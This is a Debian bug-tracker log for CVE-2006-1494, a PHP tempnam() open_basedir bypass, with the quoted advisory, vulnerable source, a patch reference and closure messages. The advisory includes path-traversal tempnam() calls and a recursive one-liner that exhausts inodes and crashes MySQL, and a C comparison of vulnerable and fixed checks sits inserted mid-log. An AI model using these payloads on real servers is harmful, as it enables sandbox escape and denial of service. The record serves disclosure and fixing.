Debian Bug report logs - #361855
[CVE-2006-1494] tempnam() open_basedir bypass
Reported by: Oliver Paulus <oliver@code-project.org>
Date: Mon, 10 Apr 2006 19:33:11 UTC
Severity: important
Tags: patch, security
Found in version php4/4:4.3.10-16
Done: sean finney <seanius@seanius.net>
Bug is archived. No further changes may be made.
Report forwarded to debian-bugs-dist@lists.debian.org, Debian PHP Maintainers <pkg-php-maint@lists.alioth.debian.org>: Bug#361855; Package php4.
Acknowledgement sent to Oliver Paulus <oliver@code-project.org>: New Bug report received and forwarded. Copy sent to Debian PHP Maintainers <pkg-php-maint@lists.alioth.debian.org>.
Message #5 received at submit@bugs.debian.org:
Package: php4
Version: 4:4.3.10-16
Severity: grave
for more information see:
http://securityreason.com/achievement_securityalert/36
--
Oliver Paulus
OpenPGP Key id: 28D9C44F
Fingerprint: EADA 62FC 07DC 3361 A3D6 4174 2DE3 C027 28D9 C44F
Public Key: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x28D9C44F
Tags added: security. Request was from Filipus Klutiero <ido@vif.com> to control@bugs.debian.org.
Information forwarded to debian-bugs-dist@lists.debian.org, Debian PHP Maintainers <pkg-php-maint@lists.alioth.debian.org>: Bug#361855; Package php4.
Acknowledgement sent to Ondrej Sury <ondrej@sury.org>: Extra info received and forwarded to list. Copy sent to Debian PHP Maintainers <pkg-php-maint@lists.alioth.debian.org>.
Message #12 received at 361855@bugs.debian.org:
[tempnam() open_basedir bypass PHP 4.4.2 and 5.1.2]
Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
-Written: 26.3.2006
-Public: 8.4.2006
from SECURITYREASON.COM
CVE-2006-1494
--- 0. Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.
A nice introduction to PHP by Stig Sæther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material is freely available.
tempnam -- Create file with unique file name
--- 1. tempnam() open_basedir bypass ---
The function tempnam() requires 2 arguments.
http://pl.php.net/manual/en/function.tempnam.php
string tempnam ( string dir, string prefix )
So, if we have open_basedir set to /home, we can't create a file above the /home directory.
In ext/standard/file.c (PHP 4.4.2)
--550-578---
PHP_FUNCTION(tempnam)
{
    pval **arg1, **arg2;
    char *d;
    char *opened_path;
    char p[64];
    FILE *fp;

    if (ZEND_NUM_ARGS() != 2 || zend_get_parameters_ex(2, &arg1, &arg2) == FAILURE) {
        WRONG_PARAM_COUNT;
    }
    convert_to_string_ex(arg1);
    convert_to_string_ex(arg2);

    /* only the directory (arg1) is checked against open_basedir;
     * the prefix (arg2) is passed on without any check */
    if (php_check_open_basedir(Z_STRVAL_PP(arg1) TSRMLS_CC)) {
        RETURN_FALSE;
    }

    d = estrndup(Z_STRVAL_PP(arg1), Z_STRLEN_PP(arg1));
    strlcpy(p, Z_STRVAL_PP(arg2), sizeof(p));

    if ((fp = php_open_temporary_file(d, p, &opened_path TSRMLS_CC))) {
        fclose(fp);
        RETVAL_STRING(opened_path, 0);
    } else {
        RETVAL_FALSE;
    }
    efree(d);
}
--550-578---
    if (php_check_open_basedir(Z_STRVAL_PP(arg1) TSRMLS_CC)) {
        RETURN_FALSE;
    }
Where is arg2?
So we can write an exploit like:
tempnam("path_from_open_basedir", "../../../../../../../../Open_basedir_bypasswd");
tempnam("/home", "../../../../../../tmp/cx");
etc.
It is a low issue, but you can try to create a lot of files and exhaust the inodes on the HD. I have one partition.
/var /dev/ad0s1e 1.0G 97M 858M 10% /var <- Space (B)
/dev/ad0s1e 1012974 94472 837466 10% 3796 137514 3% /var <- INODES
where mysql and apache try to create some files. When we exhaust the free inodes, the system has big problems with apache and mysql.
Example:
cxib# php -r 'function cx(){ tempnam("/www/", "../../../../../../var/tmp/cx"); cx(); } cx();'
/var: create/symlink failed, no inodes free
/var: create/symlink failed, no inodes free
/var: create/symlink failed, no inodes free
/var: create/symlink failed, no inodes free
... etc
/usr/local/libexec/mysqld: Can't create/write to file
'/var/tmp/ibBIsZ6o' (Errcode: 13)
And mysql die()!
--- 2. How to fix ---
CVS
http://cvs.php.net/viewcvs.cgi/php-src/NEWS
--- 3. Greets ---
For: sp3x
and
p_e_a, pi3, eax, Infospec ;]
--- 4. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
SecurityReason.Com
--
Ondrej Sury <ondrej@sury.org>
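As an added illustration of the defect the advisory describes (not code from the advisory or from PHP), the following C compares a check that validates only the directory argument, as the quoted PHP 4.4.2 code does, with one that validates the path the temporary file would actually be created at; normalize_path, within_base and the two tempnam_allowed_* functions are names assumed here for illustration, and the lexical normalization stands in for the real open_basedir check, which also resolves symlinks.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Lexically collapse "//", "." and ".." in an absolute path (assumed helper). */
static void normalize_path(const char *in, char *out, size_t outsz) {
    const char *p = in;
    out[0] = '\0';
    while (*p) {
        const char *seg = p;
        while (*p && *p != '/') p++;
        size_t n = (size_t)(p - seg);
        if (*p) p++;                                  /* skip the '/' */
        if (n == 0 || (n == 1 && seg[0] == '.')) continue;
        if (n == 2 && seg[0] == '.' && seg[1] == '.') {
            char *slash = strrchr(out, '/');          /* ".." pops a component */
            if (slash) *slash = '\0';                 /* at "/" nothing to pop */
            continue;
        }
        if (strlen(out) + 1 + n >= outsz) break;      /* out of room */
        strcat(out, "/");
        strncat(out, seg, n);
    }
    if (out[0] == '\0') strcpy(out, "/");
}

/* True if `path` (normalized) is `base` or lies beneath it; the boundary
 * test keeps "/homeevil" from matching base "/home". */
static bool within_base(const char *path, const char *base) {
    size_t bl = strlen(base);
    if (strncmp(path, base, bl) != 0) return false;
    return path[bl] == '\0' || path[bl] == '/' || (bl == 1 && base[0] == '/');
}

/* Mirrors the PHP 4.4.2 logic quoted above: only the directory is checked. */
bool tempnam_allowed_vulnerable(const char *base, const char *dir, const char *prefix) {
    char norm[1024];
    (void)prefix;                           /* never inspected, like arg2 */
    normalize_path(dir, norm, sizeof norm);
    return within_base(norm, base);
}

/* Hardened: check the path the file would really land at, so a prefix with
 * "../" is caught.  Taking the prefix's basename is an alternative mitigation. */
bool tempnam_allowed_fixed(const char *base, const char *dir, const char *prefix) {
    char joined[2048], norm[1024];
    snprintf(joined, sizeof joined, "%s/%s", dir, prefix);
    normalize_path(joined, norm, sizeof norm);
    return within_base(norm, base);
}
```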
Tags added: security. Request was from Ondrej Sury <ondrej@sury.org> to control@bugs.debian.org.
Severity set to `important'. Request was from Steve Langasek <vorlon@debian.org> to control@bugs.debian.org.
Reply sent to Steve Langasek <vorlon@debian.org>: You have taken responsibility.
Notification sent to Oliver Paulus <oliver@code-project.org>: Bug acknowledged by developer.
Message #23 received at 361855-done@bugs.debian.org:
Version: 4:4.4.2-1
severity 361854 important
severity 361855 important
severity 361856 important
thanks
On Mon, Apr 10, 2006 at 11:14:43PM +0200, Oliver Paulus wrote:
> for more information see:
> http://securityreason.com/achievement_securityalert/34
On Mon, Apr 10, 2006 at 11:14:43PM +0200, Oliver Paulus wrote:
> for more information see:
> http://securityreason.com/achievement_securityalert/35
On Mon, Apr 10, 2006 at 11:16:11PM +0200, Oliver Paulus wrote:
> for more information see:
> http://securityreason.com/achievement_securityalert/36
On Mon, Apr 10, 2006 at 11:17:52PM +0200, Oliver Paulus wrote:
> for more information see:
> http://securityreason.com/achievement_securityalert/37
It is my understanding that all of these bugs are fixed in the etch version
of php4; I'm accordingly marking them as closed.
In addition, except for the cross-site scripting bug, none of these appear
to warrant severity: grave.
--
Steve Langasek
Debian Developer
vorlon@debian.org http://www.debian.org/
"Give me a lever long enough and a Free OS to set it on, and I can move the world."
Bug marked as found in version 4:4.4.2-1. Request was from Filipus Klutiero <ido@vif.com> to control@bugs.debian.org.
Bug marked as not found in version 4:4.4.2-1. Request was from Steve Langasek <vorlon@debian.org> to control@bugs.debian.org.
Bug marked as fixed in version 4:4.4.2-1, send any further explanations to Oliver Paulus <oliver@code-project.org>. Request was from Steve Langasek <vorlon@debian.org> to control@bugs.debian.org.
Changed Bug title. Request was from Filipus Klutiero <ido@vif.com> to control@bugs.debian.org.
Bug reopened, originator not changed. Request was from Steve Langasek <vorlon@debian.org> to control@bugs.debian.org.
Information forwarded to debian-bugs-dist@lists.debian.org, Debian PHP Maintainers <pkg-php-maint@lists.alioth.debian.org>: Bug#361855; Package php4.
Acknowledgement sent to Allard Hoeve <allard@byte.nl>: Extra info received and forwarded to list. Copy sent to Debian PHP Maintainers <pkg-php-maint@lists.alioth.debian.org>.
Message #38 received at 361855@bugs.debian.org:
tags patch
thanks
The patch from CVS (adapted to fit 4:4.3.10-16) is attached.
CVS commit:
http://cvs.php.net/viewcvs.cgi/php-src/ext/standard/file.c?r1=1.279.2.70.2.4&r2=1.279.2.70.2.6&pathrev=PHP_4_4
Regards,
Allard
[tempnam.patch (text/plain, attachment)]
Tags added: patch. Request was from Allard Hoeve <allard@byte.nl> to control@bugs.debian.org.
Bug closed, send any further explanations to Oliver Paulus <oliver@code-project.org>. Request was from sean finney <seanius@seanius.net> to control@bugs.debian.org.
Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Mon, 18 Jun 2007 09:32:11 GMT)
Debian bug tracking system administrator <owner@bugs.debian.org>.
Last modified: Wed Jun 19 13:55:27 2019; Machine Name: buxtehude
Debian Bug tracking system
Debbugs is free software and licensed under the terms of the GNU Public License version 2. The current version can be obtained from https://bugs.debian.org/debbugs-source/.
Copyright © 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson, 2005-2017 Don Armstrong, and many other contributors.